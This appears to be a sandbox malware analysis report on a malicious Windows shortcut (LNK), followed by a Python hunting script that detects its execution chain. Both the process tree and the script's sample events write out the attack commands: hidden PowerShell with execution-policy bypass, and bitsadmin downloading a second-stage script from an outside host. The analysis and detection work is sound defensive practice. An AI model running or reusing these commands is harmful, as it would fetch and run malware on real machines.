Analysis
max time kernel: 137s
max time network: 131s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-08-2024 19:01
Static task: static1
Behavioral task: behavioral1
Sample: pack-KRJ88981-99192.lnk
Resource: win7-20240708-en
General
Target: pack-KRJ88981-99192.lnk
Size: 2KB
MD5: 4163cb3655dfdae03d13d623dd9dc8db
SHA1: 6183474325319e89dcf02e9bd54220d1d912638b
SHA256: 0984a28618d50bee71deec7824b449bbe04b04b0951fe4d8dcf8a3ffa7691bb7
SHA512: b5205aa5686fed2f93edcd42729fad49572fe3424459d93c32139460bf3d06ee4d18d2391800965d97129e1f39c932409f1b58388bc70841624c4f11718c8a8d
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with a hidden display window.
Download via BitsAdmin (1 TTP, 1 IoC)
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Processes:
  description         ioc                                                                                               process
  Key value queried   \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation   cmd.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
  pid   process
  2992  powershell.exe
  2992  powershell.exe
  2992  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
  description               pid   process
  Token: SeDebugPrivilege   2992  powershell.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
  description                        pid   process         target process
  PID 1092 wrote to memory of 3140   1092  cmd.exe         cmd.exe
  PID 1092 wrote to memory of 3140   1092  cmd.exe         cmd.exe
  PID 3140 wrote to memory of 3664   3140  cmd.exe         findstr.exe
  PID 3140 wrote to memory of 3664   3140  cmd.exe         findstr.exe
  PID 3140 wrote to memory of 4868   3140  cmd.exe         cmd.exe
  PID 3140 wrote to memory of 4868   3140  cmd.exe         cmd.exe
  PID 4868 wrote to memory of 2992   4868  cmd.exe         powershell.exe
  PID 4868 wrote to memory of 2992   4868  cmd.exe         powershell.exe
  PID 2992 wrote to memory of 4896   2992  powershell.exe  cmd.exe
  PID 2992 wrote to memory of 4896   2992  powershell.exe  cmd.exe
  PID 4896 wrote to memory of 4212   4896  cmd.exe         bitsadmin.exe
  PID 4896 wrote to memory of 4212   4896  cmd.exe         bitsadmin.exe
Processes
C:\Windows\system32\cmd.exe  (PID 1092)
  cmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe  (PID 3140)
    "C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\findstr.exe  (PID 3664)
      findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk
    C:\Windows\system32\cmd.exe  (PID 4868)
      cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2992)
        powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\cmd.exe  (PID 4896)
          "C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\mtAWXwsnpbHikP.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\bitsadmin.exe  (PID 4212)
            bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\mtAWXwsnpbHikP.ps1
            - Download via BitsAdmin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (PID 224)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4152,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:8
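Hunting logic for the chain recorded in the process tree above (LNK launched through cmd, findstr over *.lnk with its output redirected into a .ps1, PowerShell with a hidden window and execution-policy bypass, then bitsadmin /transfer dropping a second script under AppData). This is an added example, not sandbox output: the events are constructed from the report's own command lines and PIDs plus two benign lines, and the rule names, regular expressions and alert layout are this example's choices rather than anything the report or Tria.ge defines.

```python
"""
Correlate process-creation events into one alert for the
LNK -> findstr -> hidden PowerShell -> BITSAdmin chain.

Added example, not sandbox output. SAMPLE_EVENTS is constructed from the
report's command lines (same PIDs) plus two benign lines that must not fire.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events (pid, ppid, image, command line).
SAMPLE_EVENTS = [
    ProcEvent(1092, 0, r"C:\Windows\system32\cmd.exe",
              r"cmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk"),
    ProcEvent(3140, 1092, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk'
              r' > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass'
              r' -File C:\Users\Admin\\Documents\\blue.ps1'),
    ProcEvent(3664, 3140, r"C:\Windows\system32\findstr.exe",
              r"findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk"),
    ProcEvent(4868, 3140, r"C:\Windows\system32\cmd.exe",
              r"cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1"),
    ProcEvent(2992, 4868, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1"),
    ProcEvent(4896, 2992, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d &'
              r' bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND'
              r' "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\mtAWXwsnpbHikP.ps1'
              r' & del C:\Users\Admin\AppData\Roaming\\d & exit'),
    ProcEvent(4212, 4896, r"C:\Windows\system32\bitsadmin.exe",
              r'bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND'
              r' "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\mtAWXwsnpbHikP.ps1'),
    # Benign noise: an ordinary findstr and a BITS job listing.
    ProcEvent(5000, 4000, r"C:\Windows\system32\findstr.exe", r"findstr /i error C:\logs\app.log"),
    ProcEvent(5001, 4001, r"C:\Windows\system32\bitsadmin.exe", r"bitsadmin /list /allusers"),
]

# The redirect is on the parent cmd.exe line, not on findstr.exe itself:
# findstr [switches] <term> <...>.lnk > <...>.ps1  (the LNK carries its own script)
RE_LNK_EXTRACT = re.compile(r"findstr\s+((?:/\S+\s+)*)(\S+)\s+\S*\.lnk\b.*?>\s*\S+\.ps1", re.I)
# Hidden window and execution-policy bypass on the same PowerShell command line.
RE_PS_HIDDEN = re.compile(r"powershell(?:\.exe)?\b.*?-w(?:indowstyle)?\s+hidden", re.I)
RE_PS_BYPASS = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)
# bitsadmin /transfer <job> ... <url> <destination>
RE_BITS = re.compile(
    r'bitsadmin(?:\.exe)?\b.*?/transfer\s+(\S+).*?"?(https?://[^\s"]+)"?\s+"?([^\s"]+)"?', re.I)
DROP_EXT = (".ps1", ".exe", ".dll", ".vbs", ".js", ".hta", ".bat")


def tag_event(ev):
    """Rule names matched by one event's command line."""
    tags = set()
    if RE_LNK_EXTRACT.search(ev.cmdline):
        tags.add("lnk_self_extract")
    if RE_PS_HIDDEN.search(ev.cmdline) and RE_PS_BYPASS.search(ev.cmdline):
        tags.add("hidden_powershell")
    m = RE_BITS.search(ev.cmdline)
    if m and (m.group(3).lower().endswith(DROP_EXT) or "\\appdata\\" in m.group(3).lower()):
        tags.add("bits_script_drop")
    return tags


def ancestry(events, pid):
    """Events from pid up to the tree root, self first; `seen` guards against PID-reuse loops."""
    by_pid = {ev.pid: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """One alert per (url, destination) BITS drop whose ancestors cover every stage of the chain."""
    alerts = {}
    for ev in events:
        if "bits_script_drop" not in tag_event(ev):
            continue
        chain = ancestry(events, ev.pid)
        stages = {}  # rule name -> pid of the nearest ancestor that matched it
        for anc in chain:
            for tag in tag_event(anc):
                stages.setdefault(tag, anc.pid)
        if not all(t in stages for t in ("lnk_self_extract", "hidden_powershell")):
            continue
        bits = RE_BITS.search(ev.cmdline)
        extract_ev = next(a for a in chain if a.pid == stages["lnk_self_extract"])
        key = (bits.group(2), bits.group(3))
        if key not in alerts:
            alerts[key] = {
                "pids": [],                      # every process carrying this transfer line
                "root_pid": chain[-1].pid,       # the cmd /c <sample>.lnk launcher
                "findstr_term": RE_LNK_EXTRACT.search(extract_ev.cmdline).group(2),
                "bits_job": bits.group(1),       # same marker reused as the BITS job name
                "url": bits.group(2),
                "dest": bits.group(3),
                "stages": stages,
            }
        alerts[key]["pids"].append(ev.pid)
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Feed it Sysmon Event ID 1 or Security 4688 records after mapping the four fields; the stand-alone `findstr` and `bitsadmin` lines show why each stage is only scored in context of its ancestors. The registry lookup of Control Panel\International\Geo\Nation flagged under Signatures is not visible in process-creation telemetry, so it is deliberately not part of this rule.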
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 941B
MD5: 367a305a4630d346d724dbb691efb600
SHA1: d6c8eaad2c33dc6c1e6a78bcce5be7f1c6d31ecd
SHA256: eb806b5998540137f2d368ba7bd613d5cadf65c683467c0be55f8f4c2cd3caea
SHA512: 9484ee11a52aa8f26c85e94ebd326a75df52d33186ecbcfa118895ec39b5a1a9ede48ddabdae830294596ee9bd4827bb56c04b01e54ae6dd341ed10db2b61b11